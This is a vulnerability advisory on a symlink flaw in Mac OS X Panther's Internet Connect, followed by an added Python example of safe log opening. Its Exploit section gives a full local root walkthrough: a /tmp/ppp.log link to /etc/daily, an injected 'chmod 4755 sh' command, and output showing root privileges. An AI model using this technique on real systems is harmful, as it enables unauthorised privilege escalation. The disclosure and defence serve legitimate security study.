Summary:
The Internet Connect application in Mac OS X is used to dial in to the Internet. A vulnerability in Internet Connect allows a malicious local user to append to any file on the system, and thereby gain elevated privileges.
Credit:
The information has been provided by B-r00t.
Vulnerable Systems:
* Panther 10.3.4 - Internet Connect version 1.3 (Possibly others)
Details:
The Internet Connect application creates a ppp.log file in the /tmp/ directory. If the file already exists it is appended to; otherwise a new file is created. It is possible to trick Internet Connect into appending data to any file on the system by creating a symbolic link named /tmp/ppp.log that points to the file to be altered.
If the file /tmp/ppp.log already exists, the attack is not possible, as the file is owned by user 'root' and group 'wheel'. However, because the operating system clears the /tmp directory during system startup and during regular maintenance, it becomes possible to perform the attack as shown below:
First, a file is created to stand in for a system file, owned by and writable only by user 'root'.
maki:~ # echo "TEST" > /etc/file_owned_by_root
maki:~ # ls -l /etc/file_owned_by_root
-rw-r--r-- 1 root wheel 5 25 Jul 00:09 /etc/file_owned_by_root
maki:~ # cat /etc/file_owned_by_root
TEST
A symbolic link is now created in the '/tmp' directory pointing to the file to be altered. It is important to note that the link can be created by a user who is neither an 'admin' nor 'root'.
maki:/tmp $ id
uid=502(br00t) gid=502(br00t) groups=502(br00t)
maki:/tmp $ ln -s /etc/file_owned_by_root ppp.log
maki:/tmp $ ls -l ./ppp.log
lrwxr-xr-x 1 root wheel 23 25 Jul 00:11 ./ppp.log@ -> /etc/file_owned_by_root
Now Internet Connect is opened. Under 'Configuration' choose 'Other'. Enter some text into the 'Telephone Number' box (B-r00t r0x y3r w0rld!) and click 'Connect'.
'Cancel' can be clicked several seconds later.
Checking the original file '/etc/file_owned_by_root' we see the following:
maki:~ $ cat /etc/file_owned_by_root
TEST
Sun Jul 25 00:20:42 2004 : Version 2.0
Sun Jul 25 00:20:43 2004 : Dialing B-r00t r0x y3r w0rld!
Sun Jul 25 00:20:54 2004 : Terminating on signal 15.
Sun Jul 25 00:20:58 2004 : Serial link disconnected.
As can be seen, data has been appended to the 'protected' file.
Impact:
It is possible for a local user to escalate their privileges by appending data to specific system files. In addition, a malicious user may be able to render the machine unusable by corrupting important system files.
Exploit:
This demonstration appends commands to the '/etc/daily' file, which by default is executed at 3:15 AM each day. An alternative attack might involve appending to any of the files that are sourced at system startup, such as '/etc/rc.common'. This latter method is convenient if the user is able to reboot the machine.
Create our link:
maki:~ $ ln -s /etc/daily /tmp/ppp.log
Open Internet Connect and choose Internal Modem -> Configuration -> Other.
Internet Connect only allows certain characters to be used in the telephone number. The shell background operator '&' allows our command string to execute even though it is prefixed by text we cannot control.
Under the Telephone Number field enter:
& cd .. && cd .. && cd .. && cd .. && cd bin && chmod 4755 sh &
Click 'Connect' ... and wait (10secs) ... press 'Cancel'
If we check the content of the '/etc/daily' file:
maki:~ $ tail /etc/daily
if [ -f /etc/security ]; then
echo ""
echo "Running security:"
sh /etc/security 2>&1 | sendmail root
fi
Sun Jul 25 03:10:11 2004 : Version 2.0
Sun Jul 25 03:10:11 2004 : Dialing & cd .. && cd .. && cd .. && cd ..
&& cd bin && chmod 4755 sh &
Sun Jul 25 03:10:15 2004 : Terminating on signal 15.
Sun Jul 25 03:10:17 2004 : Serial link disconnected.
All we need to do now is sit back and wait for cron to execute '/etc/daily'.
maki:~ $ date
Sun Jul 25 03:13:43 CEST 2004
maki:~ $ cd /bin
maki:/bin $ ls -l sh
-r-xr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*
maki:/bin $ date
Sun Jul 25 03:15:50 CEST 2004
maki:/bin $ ls -l sh
-rwsr-xr-x 1 root wheel 603488 25 Jun 09:39 sh*
maki:/bin $ sh
maki:/bin # id
uid=502(br00t) euid=0(root) gid=502(br00t) groups=502(br00t)
All that is left to do is clean up '/etc/daily' and remove the link '/tmp/ppp.log'.
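The root cause behind both the Details and the Exploit sections above is a privileged process appending to a log file in a world-writable directory while following symbolic links. The following is an added example, not Apple's code and not from the advisory, of the open() discipline that closes this class of bug; all paths it uses are constructed inside a private temporary directory.

```python
# Added example (not Apple's or the advisory's code). Paths are constructed in a
# private temp directory; nothing here touches /tmp/ppp.log or /etc.
import errno
import os
import shutil
import stat
import tempfile

def safe_append_log(path: str, line: str) -> bool:
    """Append `line` to `path` only if it is a plain regular file we own.
    O_NOFOLLOW makes the kernel reject a symlink at `path` (ELOOP), so a link
    planted in a world-writable directory cannot redirect the write; fstat() on
    the open descriptor also rules out a hard link to a protected file.
    Returns True if the line was written, False if the write was refused."""
    flags = os.O_WRONLY | os.O_APPEND | os.O_CREAT | os.O_NOFOLLOW
    try:
        fd = os.open(path, flags, 0o644)
    except OSError as exc:
        if exc.errno in (errno.ELOOP, errno.EMLINK):  # symlink at path: refuse
            return False
        raise
    try:
        st = os.fstat(fd)
        if not stat.S_ISREG(st.st_mode) or st.st_nlink != 1 or st.st_uid != os.geteuid():
            return False
        os.write(fd, line.encode())
        return True
    finally:
        os.close(fd)

def demo() -> dict:
    """Replay the advisory's scenario against safe_append_log() in a temp dir."""
    work = tempfile.mkdtemp(prefix="ppplog-demo-")
    try:
        protected = os.path.join(work, "file_owned_by_root")  # stands in for /etc/daily
        log = os.path.join(work, "ppp.log")                   # stands in for /tmp/ppp.log
        with open(protected, "w") as f:
            f.write("TEST\n")
        os.symlink(protected, log)                   # the planted link from the advisory
        via_link = safe_append_log(log, "Dialing ...\n")
        with open(protected) as f:
            protected_after = f.read()               # must still be exactly "TEST\n"
        os.unlink(log)                               # link gone: a real log file is created
        fresh = safe_append_log(log, "Version 2.0\n") and safe_append_log(log, "Dialing 555\n")
        with open(log) as f:
            log_after = f.read()
        return {"via_link": via_link, "protected_after": protected_after,
                "fresh": fresh, "log_after": log_after}
    finally:
        shutil.rmtree(work, ignore_errors=True)
```

The same O_NOFOLLOW open followed by an fstat() ownership check is what a privileged daemon should do for any log it keeps in /tmp, or better still the log should live in a directory only root can write to.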